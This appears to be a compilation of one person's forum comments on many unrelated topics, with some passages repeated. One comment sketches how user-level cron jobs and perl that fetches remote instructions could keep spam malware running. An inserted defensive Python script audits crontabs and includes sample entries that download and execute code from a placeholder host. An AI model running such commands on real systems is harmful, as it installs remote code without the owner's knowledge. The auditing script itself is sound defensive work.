> the few two legged dogs that manage to get around.
You don't need to focus on the rather few two legged dogs.
There are four legged dogs that get around fine on two legs too:
http://www.youtube.com/watch?v=8MUhb00kiXs
Many other examples... So the sample size can be bigger.
> Did they hear about the three legged dog that walked into a saloon?
Walking into saloons[1] is a common way for dogs to become three legged.
[1] http://en.wikipedia.org/wiki/Saloon_(automobile)
> That's because IE's javascript engine treats javascript executed from the computer with extra privileges over javascript executed from the "Internet Zone".
Used to be you could modify that, not sure what it's like after Vista and Windows 7.
See this: How To Add 'My Computer' As the Fifth Internet Explorer Security Zone
http://support.microsoft.com/kb/555599
http://support.microsoft.com/kb/315933
If you make the security settings strict it breaks some Windows Explorer stuff in XP's "webview" mode. But it works fine in classic mode. In my opinion the classic mode is less likely to be exploitable than the XP "webview" mode, and I'm the sort who prefers classic mode anyway :).
> They're easy to generate/remember and won't be in any dictionary.
Easy to remember for who? I tried something similar before (password generator) and most people still considered them difficult to remember and grumbled...
So I think it's better to:
1) Have them write their passwords down and store them in their purse or wallet.
2) Do not give them powerful accounts where possible.
If you're the sysadmin and the Boss _insists_ on super powerful accounts and wants to use stuff like "password" as his password, and you are unable to convince him otherwise, it's not a good situation...
Y'know, the greatest threat to US security might be the US government.
1) Who wields the greatest power in the world?
2) Is the entity in #1 really using it for the benefit of the USA? Or for the benefit of others?
It's always bogeyman after bogeyman, "The US is under threat" and neverending wars against drugs/terror/whatever.
> No idea if they did something with them to make them less mirrory,
Yes, they've been exposed to The Steve's Reality Distortion Field[1]. The recent iphone 4s clearly have not been exposed long enough and need "booster shots", or The Steve was having an "off day"...
I appear to be immune, as I have a MacBook on my desk and I don't like the glossy screen and their chiclet keyboard (the ctrl key is in the wrong place!). I mostly ssh to it from a Windows 7 machine (horrors! :) ).
[1] http://www.youtube.com/watch?v=Tn-YesqzvNk
> My current system is a C2D 1.8GHz E6300 that's now pushing 4 years of age,
> yet according to all the benchmarks I've seen by AnandTech, Tom's Hardware and others, my performance results are less than 20 percent below the latest/greatest CPUs.
While you probably don't need to upgrade your CPU, I don't see how your CPU can be only 20% slower than the latest and greatest. Even for single-threaded stuff.
See: http://www.anandtech.com/bench/Product/61?vs=142
Note: I'm even comparing the 2.33GHz C2D to the latest and greatest, since the 1.8GHz one isn't listed. But I'm sure the 2.33GHz C2D should be a bit faster than your 1.8GHz C2D.
For graphically intensive games, though the difference in the average fps would not be as high, the difference in the minimum fps might be, and that might be more important in many real-world scenarios.
In many ways it's quite impressive what Intel has done with the x86. The equivalent of a hypersonic flying pig beating the less "ugly" MIPS and Alphas ;).
Assuming nothing breaks, my next upgrade is more likely to be an SSD than CPU, GPU, RAM or HDD. I'm just waiting for the prices to go down to more reasonable levels (and the number of bug reports to dwindle as well ;) ).
I jokingly suggested something related before - create some software to have servers join Facebook, and those servers can answer stupid quizzes like "20 Ways to know if you're a Windows 2008 R2 server".
With status messages like:
ProcessingNode192 is bored (has nothing to do)...
StorageServer01 is feeling degraded (on array #2)...
> From the article it sounds as if the issue in question is water supply and how changing the normal rate of glacial melt could change how people live.
They may be able to fix that:
http://www.allvoices.com/contributed-news/4932332-indian-engineer-builds-glaciers-to-fight-climate-change
Quote: As of this year he has built 10 artificial glaciers, using a simple system of pipes and stone dams to pool and direct streams of water into heavily shaded parts of valleys above a given village. During winter the pools become thick ice masses - frozen water tanks for farmers who need reliable summer flows as a hedge against changing weather patterns.
Some people have done glacier growing for a long time:
http://www.umb.no/statisk/noragric/publications/master/2007_ingvar_tveiten.pdf
Quote:
People in the districts of Baltistan and Gilgit practice 'glacier growing' with the intention of
making glaciers that will enhance water availability. This is done by carrying glacier ice from
a naturally occurring glacier up to elevations over 4000 m a.s.l., where it is placed in a dug
out cave in a scree-slope. Apart from the ice, gourds containing water are also added to
interior of the cave. Then a layer of charcoal, and sawdust or wheat husks is put on top of the
ice. The workers close off the cave by piling up rocks to cover the entrance.
Lastly, by growing many glaciers, you can affect the albedo of a mountain, or even a mountainous region, and thus affect local climate. Darker mountains absorb more heat and thus lose ice faster; reverse that by making more glaciers and other glaciers could appear without you having to make them directly.
They can change relatively rapidly with some human help. Either shrinking or in the following cases growing:
http://www.allvoices.com/contributed-news/4932332-indian-engineer-builds-glaciers-to-fight-climate-change
As of this year he has built 10 artificial glaciers, using a simple system of pipes and stone dams to pool and direct streams of water into heavily shaded parts of valleys above a given village. During winter the pools become thick ice masses - frozen water tanks for farmers who need reliable summer flows as a hedge against changing weather patterns.
The first one he built was in 1987; it is now two kilometers long and provides supplemental water to four villages. "In four months you can have one million cubic feet of ice," said Norphel, who won a CNN-IBN "Real Heroes" Award in 2008 for his work.
http://www.umb.no/statisk/noragric/publications/master/2007_ingvar_tveiten.pdf
Quote:
People in the districts of Baltistan and Gilgit practice 'glacier growing' with the intention of
making glaciers that will enhance water availability. This is done by carrying glacier ice from
a naturally occurring glacier up to elevations over 4000 m a.s.l., where it is placed in a dug
out cave in a scree-slope. Apart from the ice, gourds containing water are also added to
interior of the cave. Then a layer of charcoal, and sawdust or wheat husks is put on top of the
ice. The workers close off the cave by piling up rocks to cover the entrance.
> In fact the only problem is going to be for those allergic people
> - with previous patches all they would get is red skin, an itch, and maybe a localized rash.
> Now they risk a full blown type I allergic reaction.
Just curious - does the immune system react to foreign stuff entering the body via the skin surface differently from entering via the digestive system or intramuscular or straight into the bloodstream?
> If the user is able to make and run executable, send and receive over the network, create and delete files, then malware is also going to have that ability.
Why should it necessarily be so?
https://bugs.launchpad.net/ubuntu/+bug/156693
Assuming you want the minerals on earth at most you'd just want to slow it down to manageable speeds, not stop it (relatively). No point spending extra energy to slow it down only to spend energy to speed up the extracted stuff again.
Hookers, blow and blackjack?
I guess there was some pizza and mountain dew too.
Yeah... Then again if they're all stuck in traffic jams, if they hit a kid, the kid may not even notice :).
Yeah.
That said, it often makes very little difference when some idiot runs a PHP webapp full of holes on the webserver.
Once the attacker has exploited your webapp, they may not even need or care to escalate privileges - they probably can already get what they want. Even better if the webapp has the rights to access your crown jewels in a DB somewhere.
Seriously though, what are you going to do if printf fails? Log to a file? What if that fails? Log an error message to syslog? Then what if that fails too?
At a certain point of time it's a waste of time and resource to add extra checks.
In this case the target user would likely notice if printf fails to produce output and deal with it accordingly.
If printf produces output and still fails for some strange reason, the user is unlikely to care.
A professional way is to document it. "NOTE: in some cases printf may fail and the program not produce the desired output", buy the customer dinner and get them to sign off on everything.
Yeah I'd rather use it too if someone else was going to buy me an iphone.
If you were one of those pedants, sqrt(5) would actually be the correct answer and 2.23606798 would be incorrect (assuming you were to calculate the length of the hypotenuse).
If I were your teacher and you brought in a slide rule and knew how to use it, it just proves you ain't that stupid and if you were actually cheating it's just for fun, you'd be able to pass anyway.
> So I learned to visualize counting on my toes. I wound up with a B.Sc. in theoretical mathematics. They sure showed me.
Uh they sure showed you.
Uh, what better security model? From what I see Windows NT/2K/XP and say Ubuntu/Suse Linux have pretty much the same security model. OK so defaulting to admin user was a pretty stupid idea, but malware nowadays don't even care so much about admin - zombies that send spam and DDoS do not need admin privileges. So as long as you can get a user to run something, you're in.
Currently at work I'm writing stuff for unix/unixlike software+hardware asset management, and believe me it's not that difficult to write a cross platform "zombie" script that works on Linux, OSX etc. I wouldn't do that of course but if it ever becomes profitable enough to do so, I'm sure someone in the world will do it.
After all if you have the same Windows users who would type in passwords to unzip password locked zipped files and then launch the malware[1], why wouldn't they do the same for Linux and OSX too? Think those same idiots wouldn't type in perl Britney?
[1] Examples: http://www.f-secure.com/v-descs/email-worm_w32_bagle_fy.shtml
If you only want a spam sending zombie you do not even need root privileges, so you wouldn't even need them to enter passwords.
All you need to do is set up a user cron or at job, or modify/replace/shim a commonly used user-owned program/script. Aunt May ain't gonna even notice.
I'm personally curious whether most antivirus scanners would be able to cope with perl malware. TMTOWTDI and all that (a half decent perl coder could write something that'll churn out versions of Acme::Bleach or similar, and automatically test them on multiple virus programs - so you only "release" malware that passes).
You could create something fairly innocuous, but uses LWP or wget or curl to fetch new instructions and then run those new instructions.
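A defender's check for the user-level persistence described in the comment above, as an added example that is not part of the original comment: it triages one user's `crontab -l` output for entries that fetch and run remote code or execute from hidden or temp paths. The sample crontab, the host name and the reason labels are constructed for illustration; `at` jobs and shimmed user scripts are out of scope here.

```python
import re

# Constructed sample of one user's crontab (`crontab -l` output); not from the page.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/rsync -a /home/may/Documents /mnt/backup/
*/15 * * * * curl -s http://updates.example.invalid/t | sh
@reboot perl -MLWP::Simple -e 'eval get("http://updates.example.invalid/j")'
30 2 * * 0 /home/may/.cache/.fonts/refresh >/dev/null 2>&1
@daily wget -q -O /tmp/.x http://updates.example.invalid/x && perl /tmp/.x
"""

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")
# Tools and modules that pull content over the network.
FETCH = re.compile(r"\b(?:curl|wget|lwp-request|lwp-download)\b|-MLWP|\bLWP::", re.I)
# An interpreter chained after another command, or an explicit eval.
RUN = re.compile(r"(?:\||&&|;)\s*(?:(?:ba|da|z|k)?sh|perl|python[0-9.]*|ruby)\b|\beval\b")
# World-writable temp locations, or any hidden path component.
ODD_PATH = re.compile(r"(?:^|\s)(?:/tmp/|/var/tmp/|/dev/shm/)|/\.[^/\s.]")


def cron_command(line):
    """Return the command of a crontab line; None for comments, env or malformed lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    shortcut = line.startswith("@")          # @reboot, @daily, ...
    parts = line.split(None, 1 if shortcut else 5)
    return parts[-1] if len(parts) == (2 if shortcut else 6) else None


def audit_crontab(text):
    """Return [(line_number, command, [reasons])] for entries worth a manual look."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        cmd = cron_command(raw)
        if cmd is None:
            continue
        reasons = []
        if FETCH.search(cmd):
            reasons.append("network-fetch")
            if RUN.search(cmd):
                reasons.append("runs-fetched-code")
        if ODD_PATH.search(cmd):
            reasons.append("hidden-or-temp-path")
        if reasons:
            findings.append((lineno, cmd, reasons))
    return findings


if __name__ == "__main__":
    for lineno, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {', '.join(reasons)}: {cmd}")
```

These are triage heuristics: a hit means the entry needs a human look, and a clean result says nothing about `at` queues or modified user-owned scripts.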
> Talk WITH them for a significant part of every day, even if you have something more important to do.
:).
Nah, if you really have something more important to do, do that first. The kids will survive.
But most things aren't that important. Even though they might be more fun or less tiring than talking with the kids.
Uh, you could get lower traffic accident statistics BECAUSE more parents don't let their kids out to roam.
Not saying that your point is not true, but to actually prove increased safety you'd also need to have the number of pedestrians+cars over the years. And for children safety you'd need the number of children roaming the streets per year.
FWIW, there's the bit about: "carefully raise them in a climate-controlled hangar" that reminds me of what some bright sparks did in my country (when trying to be helpful):
They collected lots of turtle eggs and incubated them to try to increase survival rates. However ALL the hatchlings turned out to be females.
Turtle gender is determined by the temperature of the eggs:
http://www.sciencedirect.com/science?_ob=ArticleURL&_udi=B6V5X-4002DP2-4&_user=10&_coverDate=12%2F31%2F1995&_rdoc=1&_fmt=high&_orig=search&_sort=d&_docanchor=&view=c&_searchStrId=1403037906&_rerunOrigin=google&_acct=C000050221&_version=1&_urlVersion=0&_userid=10&md5=8218153421fb6ec52b5f99062d99f544
If there aren't that many eggs from that species, screwing up the gender ratio might be worse than just leaving them in "mama turtle" selected spots (and depths).
In this case I'm guessing that the climate controlled hangar will generate a more natural gender ratio (which probably includes at least one male per generation ;) ).